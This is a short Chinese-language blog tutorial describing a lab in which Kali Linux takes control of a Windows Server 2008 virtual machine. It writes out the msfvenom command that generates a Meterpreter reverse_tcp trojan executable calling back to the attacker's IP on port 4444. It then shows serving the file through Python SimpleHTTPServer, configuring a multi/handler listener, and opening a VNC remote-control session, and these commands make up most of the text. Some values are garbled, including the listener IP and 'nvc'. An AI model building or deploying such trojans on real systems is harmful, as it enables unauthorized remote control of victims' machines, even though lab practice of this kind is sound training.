Meterpreter使用木马控制se2008

准备两台虚拟机。一台kali linux 一台se2008,相互ping通
首先打开kali linux 使用工具生成一个木马命令
Msfvenom –p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4444 -f exe > hsj.exe
Meterpreter使用木马控制se2008_第1张图片
生成之后可以看一下目录有没有这个文件ls
有的话就是成功了
在这里插入图片描述
可以打开目录复制文件到se2008,这里使用的是难一点的Python SimpleHTTPServer简单HTTP服务器
输入命令python -m SimpleHTTPServer 端口号
在这里插入图片描述
这样表示搭建好了这个服务,去se2008输入ip下载就好啦
我们要下载的是创建的那个木马hsj.exe下载之后放到桌面
Meterpreter使用木马控制se2008_第2张图片
Meterpreter使用木马控制se2008_第3张图片现在先不点这个程序先回kali建立一个回链服务器
在kali终端输入msfconsole 进入在
msf5 > use exploit/multi/handler 在这里插入图片描述进入载荷
输入set payload windows/
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
在这里插入图片描述
接下来设置监听ip
Set LHOST 192.168. 0.·04
设置监听端口set LPORT 4444
在这里插入图片描述
使用run运行,并运行se2008的木马
Meterpreter使用木马控制se2008_第4张图片
返回linux发现你已经控制这台主机
Meterpreter使用木马控制se2008_第5张图片
输入run nvc远程控制
Meterpreter使用木马控制se2008_第6张图片
成功

结束

你可能感兴趣的:(Meterpreter使用木马控制se2008)